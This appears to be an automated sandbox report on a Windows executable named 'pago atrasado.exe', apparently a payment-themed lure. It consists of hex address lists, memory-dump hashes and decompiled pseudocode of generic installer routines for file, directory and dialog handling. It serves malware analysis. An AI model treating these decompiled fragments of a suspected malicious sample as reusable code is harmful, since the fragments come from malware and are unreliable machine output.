                                            0x004068f0
                                            0x004068f7
                                            0x004068fe
                                            0x004068fe
                                            0x00000000
                                            0x004068fe
                                            0x004068cd
                                            0x004068d0
                                            0x004068d3
                                            0x004068d6
                                            0x004068dd
                                            0x00406821
                                            0x00406821
                                            0x00406824
                                            0x00000000
                                            0x00000000
                                            0x004069b8
                                            0x004069bb
                                            0x004068bc
                                            0x00000000
                                            0x00000000
                                            0x004065f2
                                            0x004065f4
                                            0x004065fb
                                            0x004065fc
                                            0x004065fe
                                            0x00406601
                                            0x00000000
                                            0x00000000
                                            0x00406609
                                            0x0040660c
                                            0x0040660f
                                            0x00406611
                                            0x00406613
                                            0x00406613
                                            0x00406614
                                            0x00406617
                                            0x0040661e
                                            0x00406621
                                            0x0040662f
                                            0x00000000
                                            0x00000000
                                            0x00406905
                                            0x00406905
                                            0x00406908
                                            0x0040690f
                                            0x00000000
                                            0x00000000
                                            0x00406914
                                            0x00406914
                                            0x00406918
                                            0x00406a50
                                            0x00000000
                                            0x00406a50
                                            0x0040691e
                                            0x00406921
                                            0x00406924
                                            0x00406928
                                            0x0040692b
                                            0x00406931
                                            0x00406933
                                            0x00406933
                                            0x00406933
                                            0x00406936
                                            0x00406939
                                            0x00406939
                                            0x00406939
                                            0x00406939
                                            0x0040693c
                                            0x0040693c
                                            0x00406940
                                            0x004069a0
                                            0x004069a3
                                            0x004069a8
                                            0x004069a9
                                            0x004069ab
                                            0x004069ad
                                            0x004069b0
                                            0x004068bc
                                            0x004068bc
                                            0x00000000
                                            0x004068c2
                                            0x004068bc
                                            0x00406942
                                            0x00406948
                                            0x0040694b
                                            0x0040694e
                                            0x00406951
                                            0x00406954
                                            0x00406957
                                            0x0040695a
                                            0x0040695d
                                            0x00406960
                                            0x00406963
                                            0x0040697c
                                            0x0040697f
                                            0x00406982
                                            0x00406985
                                            0x00406989
                                            0x0040698b
                                            0x0040698b
                                            0x0040698c
                                            0x0040698f
                                            0x00406965
                                            0x00406965
                                            0x0040696d
                                            0x00406972
                                            0x00406974
                                            0x00406977
                                            0x00406977
                                            0x00406992
                                            0x00406999
                                            0x00000000
                                            0x0040699b
                                            0x00000000
                                            0x0040699b
                                            0x00000000
                                            0x00406637
                                            0x0040663a
                                            0x00406670
                                            0x004067a0
                                            0x004067a0
                                            0x004067a0
                                            0x004067a0
                                            0x004067a3
                                            0x004067a3
                                            0x004067a6
                                            0x004067a8
                                            0x00406a32
                                            0x00000000
                                            0x00406a32
                                            0x004067ae
                                            0x004067b1
                                            0x00000000
                                            0x00000000
                                            0x004067b7
                                            0x004067bb
                                            0x004067be
                                            0x004067be
                                            0x004067be
                                            0x00000000
                                            0x004067be
                                            0x0040663c
                                            0x0040663e
                                            0x00406640
                                            0x00406642
                                            0x00406645
                                            0x00406646
                                            0x00406648
                                            0x0040664a
                                            0x0040664d
                                            0x00406650
                                            0x00406666
                                            0x0040666b
                                            0x004066a3
                                            0x004066a3
                                            0x004066a7
                                            0x004066d3
                                            0x004066d5
                                            0x004066dc
                                            0x004066df
                                            0x004066e2
                                            0x004066e2
                                            0x004066e7
                                            0x004066e7
                                            0x004066e9
                                            0x004066ec
                                            0x004066f3
                                            0x004066f6
                                            0x00406723
                                            0x00406723
                                            0x00406726
                                            0x00406729
                                            0x0040679d
                                            0x0040679d
                                            0x0040679d
                                            0x00000000
                                            0x0040679d
                                            0x0040672b
                                            0x00406731
                                            0x00406734
                                            0x00406737
                                            0x0040673a
                                            0x0040673d
                                            0x00406740
                                            0x00406743
                                            0x00406746
                                            0x00406749
                                            0x0040674c
                                            0x00406765
                                            0x00406767
                                            0x0040676a
                                            0x0040676b
                                            0x0040676e
                                            0x00406770
                                            0x00406773
                                            0x00406775
                                            0x00406777
                                            0x0040677a
                                            0x0040677c
                                            0x0040677f
                                            0x00406783
                                            0x00406785
                                            0x00406785
                                            0x00406786
                                            0x00406789
                                            0x0040678c
                                            0x0040674e
                                            0x0040674e
                                            0x00406756
                                            0x0040675b
                                            0x0040675d
                                            0x00406760
                                            0x00406760
                                            0x0040678f
                                            0x00406796
                                            0x00406720
                                            0x00406720
                                            0x00406720
                                            0x00406720
                                            0x00000000
                                            0x00406798
                                            0x00000000
                                            0x00406798
                                            0x00406796
                                            0x004066a9
                                            0x004066ac
                                            0x004066ae
                                            0x004066b1
                                            0x004066b4
                                            0x004066b7
                                            0x004066b9
                                            0x004066bc
                                            0x004066bf
                                            0x004066bf
                                            0x004066c2
                                            0x004066c2
                                            0x004066c5
                                            0x004066cc
                                            0x004066a0
                                            0x004066a0
                                            0x004066a0
                                            0x004066a0
                                            0x00000000
                                            0x004066ce
                                            0x00000000
                                            0x004066ce
                                            0x004066cc
                                            0x00406652
                                            0x00406655
                                            0x00406657
                                            0x0040665a
                                            0x00000000
                                            0x00000000
                                            0x004063b9
                                            0x004063b9
                                            0x004063bd
                                            0x00406a02
                                            0x00000000
                                            0x00406a02
                                            0x004063c3
                                            0x004063c6
                                            0x004063c9
                                            0x004063cc
                                            0x004063cf
                                            0x004063d2
                                            0x004063d5
                                            0x004063d7
                                            0x004063da
                                            0x004063dd
                                            0x004063e0
                                            0x004063e2
                                            0x004063e2
                                            0x004063e2
                                            0x00000000
                                            0x00000000
                                            0x00406544
                                            0x00406544
                                            0x00406548
                                            0x00406a0e
                                            0x00000000
                                            0x00406a0e
                                            0x0040654e
                                            0x00406551
                                            0x00406554
                                            0x00406557
                                            0x00406559
                                            0x00406559
                                            0x00406559
                                            0x0040655c
                                            0x0040655f
                                            0x00406562
                                            0x00406565
                                            0x00406568
                                            0x0040656b
                                            0x0040656c
                                            0x0040656e
                                            0x0040656e
                                            0x0040656e
                                            0x00406571
                                            0x00406574
                                            0x00406577
                                            0x0040657a
                                            0x0040657a
                                            0x0040657a

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a35431ca5ac5a63de0c48c0fa1b7027ef1301f6ad8cfe25f67b835d71510927c
                                            • Instruction ID: 5a6a632b4197b5bad3eb6902eefc8e88da0621a447eca7476662d6aa47a1fed0
                                            • Opcode Fuzzy Hash: a35431ca5ac5a63de0c48c0fa1b7027ef1301f6ad8cfe25f67b835d71510927c
                                            • Instruction Fuzzy Hash: 93714571E00228CFEF28DF98C8547ADBBB1FB44305F15816AD916BB281C7789A56DF44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E10008BA7() {
                                            				intOrPtr _t3;
                                            				intOrPtr _t4;
                                            				void* _t6;
                                            				intOrPtr _t9;
                                            				void* _t12;
                                            				intOrPtr _t13;
                                            
                                            				_t3 =  *0x1001c424; // 0x200
                                            				_t13 = 0x14;
                                            				if(_t3 != 0) {
                                            					if(_t3 < _t13) {
                                            						_t3 = _t13;
                                            						goto L4;
                                            					}
                                            				} else {
                                            					_t3 = 0x200;
                                            					L4:
                                            					 *0x1001c424 = _t3;
                                            				}
                                            				_t4 = E1000A399(_t3, 4); // executed
                                            				 *0x1001c428 = _t4;
                                            				if(_t4 != 0) {
                                            					L8:
                                            					_t12 = 0;
                                            					_t9 = 0x1001b328;
                                            					while(1) {
                                            						 *((intOrPtr*)(_t12 + _t4)) = _t9;
                                            						_t9 = _t9 + 0x20;
                                            						_t12 = _t12 + 4;
                                            						if(_t9 >= 0x1001b5a8) {
                                            							break;
                                            						}
                                            						_t4 =  *0x1001c428; // 0x0
                                            					}
                                            					return 0;
                                            				} else {
                                            					 *0x1001c424 = _t13;
                                            					_t4 = E1000A399(_t13, 4);
                                            					 *0x1001c428 = _t4;
                                            					if(_t4 != 0) {
                                            						goto L8;
                                            					} else {
                                            						_t6 = 0x1a;
                                            						return _t6;
                                            					}
                                            				}
                                            			}










                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: __calloc_crt
                                            • String ID:
                                            • API String ID: 3494438863-0
                                            • Opcode ID: 8f113793b190d6d44cdcd27a5e47e89da682bb54b2fcbf77c4c3fb6db7de4087
                                            • Instruction ID: e2bdcb3561d9bfeec701474f9bbc4fdc063ddb83ebe298a8116df3d2e5ea3c85
                                            • Opcode Fuzzy Hash: 8f113793b190d6d44cdcd27a5e47e89da682bb54b2fcbf77c4c3fb6db7de4087
                                            • Instruction Fuzzy Hash: 87F0C2B12086628BF314CB69BC92F6937E8F7093B0F11442BF240DF19AE770CA814358
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 69%
                                            			E00401389(signed int _a4) {
                                            				intOrPtr* _t6;
                                            				void* _t8;
                                            				void* _t10;
                                            				signed int _t11;
                                            				void* _t12;
                                            				intOrPtr _t15;
                                            				signed int _t16;
                                            				signed int _t17;
                                            				void* _t18;
                                            
                                            				_t17 = _a4;
                                            				while(_t17 >= 0) {
                                            					_t15 =  *0x423f70; // 0x662014
                                            					_t6 = _t17 * 0x1c + _t15;
                                            					if( *_t6 == 1) {
                                            						break;
                                            					}
                                            					_push(_t6); // executed
                                            					_t8 = E00401434(); // executed
                                            					if(_t8 == 0x7fffffff) {
                                            						return 0x7fffffff;
                                            					}
                                            					_t10 = E0040136D(_t8);
                                            					if(_t10 != 0) {
                                            						_t11 = _t10 - 1;
                                            						_t16 = _t17;
                                            						_t17 = _t11;
                                            						_t12 = _t11 - _t16;
                                            					} else {
                                            						_t12 = _t10 + 1;
                                            						_t17 = _t17 + 1;
                                            					}
                                            					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                            						 *0x42372c =  *0x42372c + _t12;
                                            						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42372c, 0x7530,  *0x423714), 0);
                                            					}
                                            				}
                                            				return 0;
                                            			}













                                            APIs
                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                            • SendMessageA.USER32 ref: 004013F4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: 3f695f75208f640be867956647b5e414a31c5be601b183f87834ddd8f53d2100
                                            • Instruction ID: 9ae17229e6d33b90ed82c987c6c55cbce7d6b2b41e99f766f3e5bcfc28262e64
                                            • Opcode Fuzzy Hash: 3f695f75208f640be867956647b5e414a31c5be601b183f87834ddd8f53d2100
                                            • Instruction Fuzzy Hash: CA014472B242109BEB184B389C04B2A32A8E710319F10813BF841F72F1D638CC028B4D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00405F28(signed int _a4) {
                                            				struct HINSTANCE__* _t5;
                                            				signed int _t10;
                                            
                                            				_t10 = _a4 << 3;
                                            				_t8 =  *(_t10 + 0x409208);
                                            				_t5 = GetModuleHandleA( *(_t10 + 0x409208));
                                            				if(_t5 != 0) {
                                            					L2:
                                            					return GetProcAddress(_t5,  *(_t10 + 0x40920c));
                                            				}
                                            				_t5 = E00405EBA(_t8); // executed
                                            				if(_t5 == 0) {
                                            					return 0;
                                            				}
                                            				goto L2;
                                            			}






                                            APIs
                                            • GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                                              • Part of subcall function 00405EBA: GetSystemDirectoryA.KERNEL32 ref: 00405ED1
                                              • Part of subcall function 00405EBA: wsprintfA.USER32 ref: 00405F0A
                                              • Part of subcall function 00405EBA: LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 00405F1E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                            • String ID:
                                            • API String ID: 2547128583-0
                                            • Opcode ID: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                            • Instruction ID: ae0a47d2ae808e9ad23d4e83699500a4151a320e34d6f574464110b7e3b32053
                                            • Opcode Fuzzy Hash: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                            • Instruction Fuzzy Hash: 7AE08632A0951176D61097709D0496773ADDAC9740300087EF659F6181D738AC119E6D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 68%
                                            			E0040586F(CHAR* _a4, long _a8, long _a12) {
                                            				signed int _t5;
                                            				void* _t6;
                                            
                                            				_t5 = GetFileAttributesA(_a4); // executed
                                            				asm("sbb ecx, ecx");
                                            				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                            				return _t6;
                                            			}






                                            APIs
                                            • GetFileAttributesA.KERNEL32(00000003,00402C95,C:\Users\user\Desktop\pago atrasado.exe,80000000,00000003), ref: 00405873
                                            • CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405895
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: File$AttributesCreate
                                            • String ID:
                                            • API String ID: 415043291-0
                                            • Opcode ID: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                            • Instruction ID: e615d4ce70e2a600ad3370b8a7bf294de68ab1b424622093f8f4c5f34a5113e1
                                            • Opcode Fuzzy Hash: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                            • Instruction Fuzzy Hash: D5D09E31658301AFEF098F20DD1AF2EBBA2EB84B01F10962CB646940E0D6715C59DB16
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00405850(CHAR* _a4) {
                                            				signed char _t3;
                                            
                                            				_t3 = GetFileAttributesA(_a4); // executed
                                            				if(_t3 != 0xffffffff) {
                                            					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
                                            				}
                                            				return _t3;
                                            			}





                                            APIs
                                            • GetFileAttributesA.KERNEL32(?,0040565B,?,?,?), ref: 00405854
                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405866
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                            • Instruction ID: 81e3be7da977fa0fdb855dbc2a497946ad1e8e9610c44c99cc48e92da118c7e0
                                            • Opcode Fuzzy Hash: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                            • Instruction Fuzzy Hash: C2C00271808501AAD6016B34EE0D81F7B66EB54321B148B25F469A01F0C7315C66DA2A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004053C3(CHAR* _a4) {
                                            				int _t2;
                                            
                                            				_t2 = CreateDirectoryA(_a4, 0); // executed
                                            				if(_t2 == 0) {
                                            					return GetLastError();
                                            				}
                                            				return 0;
                                            			}





                                            APIs
                                            • CreateDirectoryA.KERNEL32(?,00000000,004030EE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 004053C9
                                            • GetLastError.KERNEL32 ref: 004053D7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: CreateDirectoryErrorLast
                                            • String ID:
                                            • API String ID: 1375471231-0
                                            • Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                            • Instruction ID: 6b45de36f316d487aa01e9413b839baa5bb3cf32c01ac4838d60d751b980a7e6
                                            • Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                            • Instruction Fuzzy Hash: E0C04C30619642DBD7105B31ED08B177E60EB50781F208935A506F11E0D6B4D451DD3E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00403081(void* _a4, long _a8) {
                                            				int _t6;
                                            				long _t10;
                                            
                                            				_t10 = _a8;
                                            				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
                                            				if(_t6 == 0 || _a8 != _t10) {
                                            					return 0;
                                            				} else {
                                            					return 1;
                                            				}
                                            			}






                                            APIs
                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,00402EDA,000000FF,00000004,00000000,00000000,00000000), ref: 00403098
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                            • Instruction ID: e4cef5105026143dd13b930ce46becb45ea6c66ba88fb4286e933b642882ba15
                                            • Opcode Fuzzy Hash: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                            • Instruction Fuzzy Hash: F3E08631211118FBDF209E51EC00A973B9CDB04362F008032B904E5190D538DA10DBA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 25%
                                            			E10008872() {
                                            				void* _t1;
                                            				void* _t2;
                                            				void* _t3;
                                            				void* _t4;
                                            				void* _t7;
                                            
                                            				_push(1);
                                            				_push(0);
                                            				_push(0); // executed
                                            				_t1 = E100088D9(_t2, _t3, _t4, _t7); // executed
                                            				return _t1;
                                            			}









                                            APIs
                                            • _doexit.LIBCMT ref: 10008878
                                              • Part of subcall function 100088D9: __lock.LIBCMT ref: 100088E7
                                              • Part of subcall function 100088D9: RtlDecodePointer.NTDLL(10019048,0000001C,1000886D,?,00000001,00000000,?,1000864A,000000FF,?,10009F2B,00000011,?,?,1000CB2C,0000000D), ref: 10008926
                                              • Part of subcall function 100088D9: DecodePointer.KERNEL32(?,1000864A,000000FF,?,10009F2B,00000011,?,?,1000CB2C,0000000D), ref: 10008937
                                              • Part of subcall function 100088D9: EncodePointer.KERNEL32(00000000,?,1000864A,000000FF,?,10009F2B,00000011,?,?,1000CB2C,0000000D), ref: 10008950
                                              • Part of subcall function 100088D9: DecodePointer.KERNEL32(-00000004,?,1000864A,000000FF,?,10009F2B,00000011,?,?,1000CB2C,0000000D), ref: 10008960
                                              • Part of subcall function 100088D9: EncodePointer.KERNEL32(00000000,?,1000864A,000000FF,?,10009F2B,00000011,?,?,1000CB2C,0000000D), ref: 10008966
                                              • Part of subcall function 100088D9: DecodePointer.KERNEL32(?,1000864A,000000FF,?,10009F2B,00000011,?,?,1000CB2C,0000000D), ref: 1000897C
                                              • Part of subcall function 100088D9: DecodePointer.KERNEL32(?,1000864A,000000FF,?,10009F2B,00000011,?,?,1000CB2C,0000000D), ref: 10008987
                                              • Part of subcall function 100088D9: __initterm.LIBCMT ref: 100089AF
                                              • Part of subcall function 100088D9: __initterm.LIBCMT ref: 100089C0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: Pointer$Decode$Encode__initterm$__lock_doexit
                                            • String ID:
                                            • API String ID: 3712619029-0
                                            • Opcode ID: 20a20f608ea4bc6c94e18f730bbbe563946a4bfee6b1cba253202f95a216a98f
                                            • Instruction ID: 744bbbe286876aa1c4a0d58eba5af4a6dd6ab550502f5fb5309f8cdb1ca7ff02
                                            • Opcode Fuzzy Hash: 20a20f608ea4bc6c94e18f730bbbe563946a4bfee6b1cba253202f95a216a98f
                                            • Instruction Fuzzy Hash: 5DA00269BD430021F86091902C43F5526516750F51FD44050FB4D2C1C5E8C623584357
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004030B3(long _a4) {
                                            				long _t2;
                                            
                                            				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
                                            				return _t2;
                                            			}





                                            APIs
                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00402E1C,000081E4), ref: 004030C1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: FilePointer
                                            • String ID:
                                            • API String ID: 973152223-0
                                            • Opcode ID: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                            • Instruction ID: aafe5e0ddee8b519ffd98e4e857b28c3b9165386d483fecacc2863ad1570d206
                                            • Opcode Fuzzy Hash: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                            • Instruction Fuzzy Hash: D6B01231544200BFDB214F00DF06F057B21B79C701F208030B340380F082712430EB1E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004056B6(CHAR* _a4, intOrPtr _a8) {
                                            				CHAR* _t3;
                                            				char _t4;
                                            
                                            				_t3 = _a4;
                                            				while(1) {
                                            					_t4 =  *_t3;
                                            					if(_t4 == 0) {
                                            						break;
                                            					}
                                            					if(_t4 != _a8) {
                                            						_t3 = CharNextA(_t3); // executed
                                            						continue;
                                            					}
                                            					break;
                                            				}
                                            				return _t3;
                                            			}






                                            APIs
                                            • CharNextA.USER32(?,004031E6,"C:\Users\user\Desktop\pago atrasado.exe" ,00409168), ref: 004056C3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: CharNext
                                            • String ID:
                                            • API String ID: 3213498283-0
                                            • Opcode ID: b78f2958c7f68e19d57b7ad513a89c73604121592eb64134f43146a97932e323
                                            • Instruction ID: b92c2b2cc925d09e3655dddfc00fa39e31e8eee3e0a1cce73cff96a1e9958276
                                            • Opcode Fuzzy Hash: b78f2958c7f68e19d57b7ad513a89c73604121592eb64134f43146a97932e323
                                            • Instruction Fuzzy Hash: B7C0806440C74057D611471040345777FF0AA91750F945C5EF0C963170C1357C408F3B
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            C-Code - Quality: 96%
                                            			E00404FC2(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                            				struct HWND__* _v8;
                                            				long _v12;
                                            				struct tagRECT _v28;
                                            				void* _v36;
                                            				signed int _v40;
                                            				int _v44;
                                            				int _v48;
                                            				signed int _v52;
                                            				int _v56;
                                            				void* _v60;
                                            				void* _v68;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				long _t87;
                                            				unsigned int _t92;
                                            				unsigned int _t93;
                                            				int _t94;
                                            				int _t95;
                                            				long _t98;
                                            				void* _t101;
                                            				intOrPtr _t123;
                                            				struct HWND__* _t127;
                                            				int _t149;
                                            				int _t150;
                                            				struct HWND__* _t154;
                                            				struct HWND__* _t158;
                                            				struct HMENU__* _t160;
                                            				long _t162;
                                            				void* _t163;
                                            				short* _t164;
                                            
                                            				_t154 =  *0x423724; // 0x0
                                            				_t149 = 0;
                                            				_v8 = _t154;
                                            				if(_a8 != 0x110) {
                                            					__eflags = _a8 - 0x405;
                                            					if(_a8 == 0x405) {
                                            						CloseHandle(CreateThread(0, 0, E00404F56, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                                            					}
                                            					__eflags = _a8 - 0x111;
                                            					if(_a8 != 0x111) {
                                            						L17:
                                            						__eflags = _a8 - 0x404;
                                            						if(_a8 != 0x404) {
                                            							L25:
                                            							__eflags = _a8 - 0x7b;
                                            							if(_a8 != 0x7b) {
                                            								goto L20;
                                            							}
                                            							__eflags = _a12 - _t154;
                                            							if(_a12 != _t154) {
                                            								goto L20;
                                            							}
                                            							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
                                            							__eflags = _t87 - _t149;
                                            							_a8 = _t87;
                                            							if(_t87 <= _t149) {
                                            								L37:
                                            								return 0;
                                            							}
                                            							_t160 = CreatePopupMenu();
